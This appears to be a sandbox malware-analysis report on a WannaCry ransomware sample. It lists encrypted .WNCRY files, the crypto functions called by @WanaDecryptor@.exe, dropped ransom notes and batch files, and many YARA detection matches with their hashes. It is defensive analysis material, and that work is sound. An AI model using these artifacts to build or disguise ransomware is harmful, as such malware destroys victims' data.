Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_8[1].txt.WNCRY (copy) entropy: 7.99608409501	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_9[1].txt.WNCRY (copy) entropy: 7.99719160961	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx.WNCRY (copy) entropy: 7.99598914203	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1024_768_POS4.jpg.WNCRY (copy) entropy: 7.99504337952	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1920_1080_POS4.jpg.WNCRY (copy) entropy: 7.99844493874	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ea91225a-124d-44ac-a71c-a1f2683bf2a0}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99634781809	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133664196701332050.txt.WNCRY (copy) entropy: 7.99844759878	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133664197001416167.txt.WNCRY (copy) entropy: 7.99834860258	Jump to dropped file

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,	31_2_004049B0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,	31_2_00404B70
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_004046F0 CryptImportKey,	31_2_004046F0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,	34_2_004049B0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,	34_2_00404B70
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_004046F0 CryptImportKey,	34_2_004046F0

System Summary

Malicious sample detected (through community Yara rule)

Source: LisectAVT_2403002A_126.EXE.exe, type: SAMPLE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: LisectAVT_2403002A_126.EXE.exe, type: SAMPLE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: LisectAVT_2403002A_126.EXE.exe, type: SAMPLE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 34.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 31.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 34.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 31.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 46.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 46.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 0.0.LisectAVT_2403002A_126.EXE.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 0.0.LisectAVT_2403002A_126.EXE.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 0.0.LisectAVT_2403002A_126.EXE.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 00000000.00000000.849626717.000000000040E000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@WanaDecryptor@.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe

Process Stats: CPU usage > 6%

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_00411CF0	31_2_00411CF0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_0040B0C0	31_2_0040B0C0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_0040A150	31_2_0040A150
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_0040A9D0	31_2_0040A9D0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_00410180	31_2_00410180
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_0040B3C0	31_2_0040B3C0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_0040FBC0	31_2_0040FBC0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_00410460	31_2_00410460
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_0040ADC0	31_2_0040ADC0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_0040A610	31_2_0040A610
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_0040DF30	31_2_0040DF30
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_00406F80	31_2_00406F80
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_0040FF90	31_2_0040FF90
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_0040B0C0	34_2_0040B0C0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_0040A150	34_2_0040A150
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_0040A9D0	34_2_0040A9D0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_00410180	34_2_00410180
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_0040B3C0	34_2_0040B3C0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_0040FBC0	34_2_0040FBC0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_00410460	34_2_00410460
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_00411CF0	34_2_00411CF0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_0040ADC0	34_2_0040ADC0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_0040A610	34_2_0040A610
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_0040DF30	34_2_0040DF30
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_00406F80	34_2_00406F80
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_0040FF90	34_2_0040FF90
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Code function: 42_2_6F915F17	42_2_6F915F17
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Code function: 42_2_6F913329	42_2_6F913329
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Code function: 42_2_6F91375E	42_2_6F91375E
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Code function: 42_2_6F91DF4E	42_2_6F91DF4E
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Code function: 42_2_6F91DAA0	42_2_6F91DAA0
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Code function: 42_2_6F912ADC	42_2_6F912ADC
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Code function: 42_2_6F912EF4	42_2_6F912EF4
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Code function: 42_2_6F9125E0	42_2_6F9125E0
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Code function: 42_2_6F924531	42_2_6F924531
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Code function: 42_2_6F916146	42_2_6F916146
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Code function: 42_2_6F915CE8	42_2_6F915CE8

Source: C:\Windows\SysWOW64\wbem\WMIC.exe

Code function: String function: 6F9122A0 appears 31 times

Source: LisectAVT_2403002A_126.EXE.exe	Static PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: taskdl.exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: libeay32.dll.31.dr	Static PE information: Number of sections : 18 > 10
Source: libevent_extra-2-0-5.dll.31.dr	Static PE information: Number of sections : 17 > 10
Source: libgcc_s_sjlj-1.dll.31.dr	Static PE information: Number of sections : 17 > 10
Source: libssp-0.dll.31.dr	Static PE information: Number of sections : 17 > 10
Source: libevent_core-2-0-5.dll.31.dr	Static PE information: Number of sections : 17 > 10
Source: ssleay32.dll.31.dr	Static PE information: Number of sections : 18 > 10
Source: libevent-2-0-5.dll.31.dr	Static PE information: Number of sections : 17 > 10

Source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.882205706.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs LisectAVT_2403002A_126.EXE.exe
Source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.890589272.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs LisectAVT_2403002A_126.EXE.exe
Source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1376826928.0000000000B07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs LisectAVT_2403002A_126.EXE.exe
Source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1171288233.0000000000B06000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs LisectAVT_2403002A_126.EXE.exe
Source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1843993225.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs LisectAVT_2403002A_126.EXE.exe
Source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.872152587.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs LisectAVT_2403002A_126.EXE.exe
Source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.859863996.0000000002633000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs LisectAVT_2403002A_126.EXE.exe
Source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1844791357.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs LisectAVT_2403002A_126.EXE.exe
Source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.859735110.0000000002648000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs LisectAVT_2403002A_126.EXE.exe

Source: LisectAVT_2403002A_126.EXE.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe

Source: LisectAVT_2403002A_126.EXE.exe, type: SAMPLE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: LisectAVT_2403002A_126.EXE.exe, type: SAMPLE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: LisectAVT_2403002A_126.EXE.exe, type: SAMPLE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 34.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 31.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 34.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 31.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 46.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 46.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.0.LisectAVT_2403002A_126.EXE.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.0.LisectAVT_2403002A_126.EXE.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 0.0.LisectAVT_2403002A_126.EXE.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 00000000.00000000.849626717.000000000040E000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@WanaDecryptor@.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\109861721946031.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
